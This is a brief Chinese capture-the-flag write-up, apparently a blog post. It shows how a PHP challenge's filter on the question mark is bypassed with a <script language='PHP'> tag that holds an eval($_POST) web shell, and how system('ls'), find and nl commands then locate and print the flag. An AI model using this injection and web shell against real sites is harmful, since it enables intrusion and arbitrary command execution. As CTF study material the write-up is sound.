博客内容讲述了如何在PHP环境中,通过代码注入技术规避问号过滤,使用<script>标签执行PHP代码,例如:`code=<script language='PHP'>eval($_POST[cmd]);</script>&cmd=system('ls')`来获取系统目录信息。通过连续的系统命令如`find`和`nl`,逐步揭示文件内容,最终找到并显示flag。
打开题目看代码
str_replace()把字符串中某一的字符,换成另一个字符并且区分大小写。
所以存在一个过滤,把问号过滤掉了。
所以常见的<?php ?>和<? ?>就不可以用了。但是我们还可以用<script></script>
这种php标签可以不用问号。
所以构造语句code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('ls');
有回显,可以接着就是查询flag
code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('find /f*');
最后打开即可 code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('nl /f*');
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
